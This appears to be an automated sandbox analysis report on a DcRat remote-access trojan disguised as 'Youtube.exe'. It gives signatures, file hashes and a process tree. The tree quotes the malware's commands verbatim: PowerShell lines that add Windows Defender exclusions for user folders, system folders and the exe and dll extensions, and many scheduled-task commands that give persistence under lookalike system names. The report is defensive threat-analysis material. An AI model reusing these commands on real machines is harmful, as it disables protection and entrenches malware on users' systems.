Overview

overview

10

Static

static

10

Youtube.exe

windows10-1703-x64

10

Youtube.exe

windows10-2004-x64

10

Youtube.exe

windows11-21h2-x64

Analysis

  • max time kernel
    12s
  • max time network
    24s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-07-2024 13:31

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Youtube.exe

  • Size

    8.7MB

  • MD5

    d25ebdfc04bdadea74017fa72f90781f

  • SHA1

    f7278c4d04fc4db888368e0245d7607d8bcbb557

  • SHA256

    9f30de67eacb0138506eff3c67dc9c52b0e923416dc75722ac90b12210b5383f

  • SHA512

    77cca4e741a6f96cc35a3ce55c3f899f902719c8ee29c84a6f5dcb57e9d6b8f85cad2042486ff907046f3c87673f5a34da73730256822d090ae764ba21064e71

  • SSDEEP

    196608:fE7JB0tYrXLW+d7UcIxptvyUQymRDSI1WCOK5m:fE9B0OjrdLK4J/Y

Score
10/10
dcratexecutioninfostealerpersistencerat

Malware Config

Signatures

  • DcRat 29 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

    ratinfostealerdcrat
  • Modifies WinLogon for persistence 2 TTPs 9 IoCs
    persistence
  • Process spawned unexpected child process 27 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • DCRat payload 6 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

    rat
  • Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • .NET Reactor proctector 1 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 8 IoCs
  • Loads dropped DLL 3 IoCs
  • Adds Run key to start application 2 TTPs 18 IoCs
    persistence
  • Blocklisted process makes network request 2 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Program Files directory 8 IoCs
  • Drops file in Windows directory 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 28 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 51 IoCs
  • Suspicious use of AdjustPrivilegeToken 53 IoCs
  • Suspicious use of WriteProcessMemory 61 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\Youtube.exe
    "C:\Users\Admin\AppData\Local\Temp\Youtube.exe"
    1⤵
    • DcRat
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3892
    • C:\Users\Admin\AppData\Local\Temp\Result.exe
      "C:\Users\Admin\AppData\Local\Temp\Result.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2576
      • C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1156
        • C:\Windows\SysWOW64\msiexec.exe
          "msiexec" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4200
      • C:\Users\Admin\AppData\Local\Temp\solara.exe
        "C:\Users\Admin\AppData\Local\Temp\solara.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:3092
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:716
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat" "
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1856
            • C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe
              "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"
              6⤵
              • Modifies WinLogon for persistence
              • Checks computer location settings
              • Executes dropped EXE
              • Adds Run key to start application
              • Drops file in Program Files directory
              • Drops file in Windows directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3148
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:928
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\csrss.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2096
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Google\Chrome\Application\upfc.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1724
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\dllhost.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3664
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Music\wscript.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1456
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Photo Viewer\TextInputHost.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2916
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\wscript.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1452
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Mozilla Firefox\uninstall\services.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1216
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\Bloxstrap.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3936
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\PrintDialog\pris\conhost.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2088
              • C:\Program Files\Windows Sidebar\dllhost.exe
                "C:\Program Files\Windows Sidebar\dllhost.exe"
                7⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2164
    • C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
      "C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1476
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\winNet\we9fgyC144zVOkGk.vbe"
        3⤵
          PID:3608
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\winNet\rsH0xIUsPk2E2Mq2a4QwbDGWD6K8lz.bat" "
            4⤵
              PID:2180
              • C:\winNet\ComContainerbrowserRefRuntime.exe
                "C:\winNet/ComContainerbrowserRefRuntime.exe"
                5⤵
                  PID:3460
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CT5gH1Th8q.bat"
                    6⤵
                      PID:4384
                      • C:\Windows\system32\chcp.com
                        chcp 65001
                        7⤵
                          PID:3784
                        • C:\Windows\system32\w32tm.exe
                          w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                          7⤵
                            PID:4920
                • C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
                  "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"
                  2⤵
                  • Executes dropped EXE
                  PID:344
                  • C:\Windows\System32\conhost.exe
                    "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"
                    3⤵
                      PID:4644
                      • C:\Windows\System32\cmd.exe
                        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                        4⤵
                          PID:1912
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                            5⤵
                            • Command and Scripting Interpreter: PowerShell
                            PID:208
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                            5⤵
                            • Command and Scripting Interpreter: PowerShell
                            PID:524
                        • C:\Windows\System32\cmd.exe
                          "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"
                          4⤵
                            PID:3344
                            • C:\Windows\system32\schtasks.exe
                              schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"
                              5⤵
                              • DcRat
                              • Scheduled Task/Job: Scheduled Task
                              PID:2720
                      • C:\Users\Admin\AppData\Local\Temp\Frage build.exe
                        "C:\Users\Admin\AppData\Local\Temp\Frage build.exe"
                        2⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • Modifies registry class
                        • Suspicious use of WriteProcessMemory
                        PID:3700
                        • C:\Windows\SysWOW64\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe"
                          3⤵
                            PID:784
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c ""C:\DriversavessessionDlldhcp\exFbRiwQoowToPhSTKSA9iYE.bat" "
                              4⤵
                                PID:3224
                                • C:\DriversavessessionDlldhcp\Roblox.exe
                                  "C:\DriversavessessionDlldhcp/Roblox.exe"
                                  5⤵
                                    PID:464
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\winNet\csrss.exe'" /f
                            1⤵
                            • DcRat
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:636
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\winNet\csrss.exe'" /rl HIGHEST /f
                            1⤵
                            • DcRat
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:4516
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\winNet\csrss.exe'" /rl HIGHEST /f
                            1⤵
                            • DcRat
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:1420
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 14 /tr "'C:\Program Files\Google\Chrome\Application\upfc.exe'" /f
                            1⤵
                            • DcRat
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:464
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Program Files\Google\Chrome\Application\upfc.exe'" /rl HIGHEST /f
                            1⤵
                            • DcRat
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:2532
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 12 /tr "'C:\Program Files\Google\Chrome\Application\upfc.exe'" /rl HIGHEST /f
                            1⤵
                            • DcRat
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:4912
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Sidebar\dllhost.exe'" /f
                            1⤵
                            • DcRat
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:3344
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\dllhost.exe'" /rl HIGHEST /f
                            1⤵
                            • DcRat
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:536
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Sidebar\dllhost.exe'" /rl HIGHEST /f
                            1⤵
                            • DcRat
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:832
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Music\wscript.exe'" /f
                            1⤵
                            • DcRat
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:2508
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\Users\Public\Music\wscript.exe'" /rl HIGHEST /f
                            1⤵
                            • DcRat
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:4276
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 10 /tr "'C:\Users\Public\Music\wscript.exe'" /rl HIGHEST /f
                            1⤵
                            • DcRat
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:3468
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Photo Viewer\TextInputHost.exe'" /f
                            1⤵
                            • DcRat
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:2140
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\TextInputHost.exe'" /rl HIGHEST /f
                            1⤵
                            • DcRat
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:1396
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Photo Viewer\TextInputHost.exe'" /rl HIGHEST /f
                            1⤵
                            • DcRat
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:4508
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\wscript.exe'" /f
                            1⤵
                            • DcRat
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:4480
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\wscript.exe'" /rl HIGHEST /f
                            1⤵
                            • DcRat
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:3920
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\wscript.exe'" /rl HIGHEST /f
                            1⤵
                            • DcRat
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:4948
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Program Files\Mozilla Firefox\uninstall\services.exe'" /f
                            1⤵
                            • DcRat
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:2732
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\uninstall\services.exe'" /rl HIGHEST /f
                            1⤵
                            • DcRat
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:2012
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "servicess" /sc MINUTE /mo 6 /tr "'C:\Program Files\Mozilla Firefox\uninstall\services.exe'" /rl HIGHEST /f
                            1⤵
                            • DcRat
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:648
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "BloxstrapB" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\Bloxstrap.exe'" /f
                            1⤵
                            • DcRat
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:3128
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "Bloxstrap" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\Bloxstrap.exe'" /rl HIGHEST /f
                            1⤵
                            • DcRat
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:4976
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "BloxstrapB" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\Bloxstrap.exe'" /rl HIGHEST /f
                            1⤵
                            • DcRat
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:1108
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Windows\PrintDialog\pris\conhost.exe'" /f
                            1⤵
                            • DcRat
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:3076
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\PrintDialog\pris\conhost.exe'" /rl HIGHEST /f
                            1⤵
                            • DcRat
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:5052
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\Windows\PrintDialog\pris\conhost.exe'" /rl HIGHEST /f
                            1⤵
                            • DcRat
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:4892
                          • C:\Windows\system32\msiexec.exe
                            C:\Windows\system32\msiexec.exe /V
                            1⤵
                            • Blocklisted process makes network request
                            • Enumerates connected drives
                            • Drops file in Windows directory
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:868
                            • C:\Windows\System32\MsiExec.exe
                              C:\Windows\System32\MsiExec.exe -Embedding 18DD1FD33D0084E1D1DBE34EF084749F
                              2⤵
                              • Loads dropped DLL
                              PID:3528
                            • C:\Windows\syswow64\MsiExec.exe
                              C:\Windows\syswow64\MsiExec.exe -Embedding A391D35E9DB6C830DBB45D9C4A750EF7
                              2⤵
                              • Loads dropped DLL
                              PID:1560

                          Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\DriversavessessionDlldhcp\Roblox.exe
                            Filesize

                            1.8MB

                            MD5

                            26e388ea32df635cd424decb2bff563e

                            SHA1

                            510ac8024dd524f7ebc92210b189804921fd29ee

                            SHA256

                            cf90b0e7318a9e4e3cbaeebd3f82f823e7754a35e689979fabd18e785383dc8e

                            SHA512

                            b59ecb856064e3d590ec3d0f17410195bf08cd6a2b0bb091c92c9200c3e163f5b0e918b09f7ff0f51990dae49ba27ea566862353647ee59ae9ea9c192faf79d1

                            Download Submit

                          • C:\DriversavessessionDlldhcp\exFbRiwQoowToPhSTKSA9iYE.bat
                            Filesize

                            94B

                            MD5

                            1689f0727433844f3250241e9e030427

                            SHA1

                            bac7909c2a8e7a666edb56a7df07650701d9c013

                            SHA256

                            fa50cc35b05b88a91212dba6ca7cb348368309e9fdfa16273d1adc659f42cdab

                            SHA512

                            d814a8015dcce43a0128c7a5c34998a9a7df03231c5c2b1df169e8986de6e8ec1e77692756ada79f8355abaa50c35ccf5d5f2eaa13c76e02a4dd582ce9c51528

                            Download Submit

                          • C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe
                            Filesize

                            239B

                            MD5

                            3492e48fb2e9fb2bfc18658e3d8f88bd

                            SHA1

                            34cec8222aedc8baf774aa863a041a23971c7631

                            SHA256

                            c0857f8c479b8fa90402a735a24b312819cdcec5c69b90bd6dafc175dbfd3b2e

                            SHA512

                            a9923e942d86d3e29a52d421ceb96c8cef8aae769cbb18a65e93793e444cf7712c52aaba3a5da2f06d2ee5c3eef42d6972457b13aa06a060eaf9b26369d0efc9

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                            Filesize

                            2KB

                            MD5

                            d85ba6ff808d9e5444a4b369f5bc2730

                            SHA1

                            31aa9d96590fff6981b315e0b391b575e4c0804a

                            SHA256

                            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                            SHA512

                            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            Filesize

                            944B

                            MD5

                            59d97011e091004eaffb9816aa0b9abd

                            SHA1

                            1602a56b01dd4b7c577ca27d3117e4bcc1aa657b

                            SHA256

                            18f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d

                            SHA512

                            d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            Filesize

                            944B

                            MD5

                            6d42b6da621e8df5674e26b799c8e2aa

                            SHA1

                            ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

                            SHA256

                            5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

                            SHA512

                            53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            Filesize

                            944B

                            MD5

                            2e907f77659a6601fcc408274894da2e

                            SHA1

                            9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

                            SHA256

                            385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

                            SHA512

                            34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            Filesize

                            944B

                            MD5

                            bd5940f08d0be56e65e5f2aaf47c538e

                            SHA1

                            d7e31b87866e5e383ab5499da64aba50f03e8443

                            SHA256

                            2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

                            SHA512

                            c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            Filesize

                            944B

                            MD5

                            c6c940df49fc678d1c74fea3c57a32f9

                            SHA1

                            79edd715358a82e6d29970998ff2e9b235ea4217

                            SHA256

                            4e50925adb70141467a7081cc905c76fd6dab841195400683f9f67fc2602aa0a

                            SHA512

                            3c1df9c18f1756ead841f68916dec03a066078b0705443d3f886fd990e2e42ebbffd46916be3f6fe39ea0505fc2c848fbdea56828fbd5aa5f24b329f8d979707

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            Filesize

                            944B

                            MD5

                            2369bbb2c26bb259a7cb3d872be81aaf

                            SHA1

                            31f19466344ad63e22da94aa37c9f2d6866fd653

                            SHA256

                            59bf4e18373186725669d90c11001949b0d639b1cb35b41593d986de75d7998f

                            SHA512

                            c6a68d947dd81797567b1a4e09e0b135352e6282e6e3328114aaa508282defe4b63b1527ae219db931321ae18bcc1755cf9adaec51ed633cf4441cee59ec340b

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
                            Filesize

                            2.2MB

                            MD5

                            7529e4004c0fe742df146464e6aeadb0

                            SHA1

                            ae7341ee066b31de5a1a1a25851b70ced41de13f

                            SHA256

                            a80a68f1b63391ba9a91870173a0db962c73950c191594750e705f1d1c77be81

                            SHA512

                            d50112143b1a2acf918606e2f0a1d01fc2d5ed3e2e4ecdcdb2405669af2444a3274c7e39461c723d675e230f8cb72be351cdb1b8e31b9f5b5517a03c66f47f27

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Temp\CT5gH1Th8q.bat
                            Filesize

                            214B

                            MD5

                            b0086dcc8c7f7b9b2fc858b0d088ced1

                            SHA1

                            6cff6fd4fd7859196297026a1aa8c9226c22a6d0

                            SHA256

                            6ff38b5dc91ab1771bb5a4f38daa90639a08a43360c8af0cf93cf29c5ac7d1cc

                            SHA512

                            c5bf8d72aec3c3460526b5d14a8dbdee80dcbec004e5b97cd3af55fd3b43015d6d6227e0295fdd6f45802d89cd356c7c4d156a29b03eb19c44ec7105a3a9e11a

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
                            Filesize

                            1.9MB

                            MD5

                            7d4b84a8c3d14cb3d1bb864719463404

                            SHA1

                            544cf51aec717c63552f0fdf97d364b1b62a7a0c

                            SHA256

                            3aa0597b5d053594cce551ac5d8a9bc83059c3d55ef024dc7dff59c73a88e663

                            SHA512

                            d962cbe9998d2e04a9bbd2ab1a97535409015b183acc0d61d49f6b696eac046e7c41028b55c8d33c3b6c1dacbf3704771dbdf911b06c8e9c247b49d2c6864a29

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Temp\Frage build.exe
                            Filesize

                            2.1MB

                            MD5

                            11fdce42422f8ed518fedf290f5bfc3c

                            SHA1

                            f18a4ad694af5ba50a7697b4cb66308454c555d9

                            SHA256

                            b62b6592549d56b573efdd053c73e37542742301fffbeb786a60c227564b97a3

                            SHA512

                            4e1c700ed33db9b29fe3545efeb7616ccf9c86b0716ee684d5375097651b44b3aab99302e6e159bb3f088b4cb59334aa473864d3d8b43a583b3cbfd9a12d16ae

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Temp\Result.exe
                            Filesize

                            2.6MB

                            MD5

                            170b43350048ed4b6fca0e50a0178621

                            SHA1

                            db863b7b04a7c58baa9120e2f184517ed27a7252

                            SHA256

                            248856f33f34ee7f97fd2a83264d4c85251f06bce6d5761d416405a33849079b

                            SHA512

                            e8dc07cf863d01e5ae18b44432cbf3ae54cd24f12d00981a5b5df51684039783339f7b43f79816d25790210654b3da17eae4687f2a3b34b6e2570c5ce990bde7

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
                            Filesize

                            797KB

                            MD5

                            36b62ba7d1b5e149a2c297f11e0417ee

                            SHA1

                            ce1b828476274375e632542c4842a6b002955603

                            SHA256

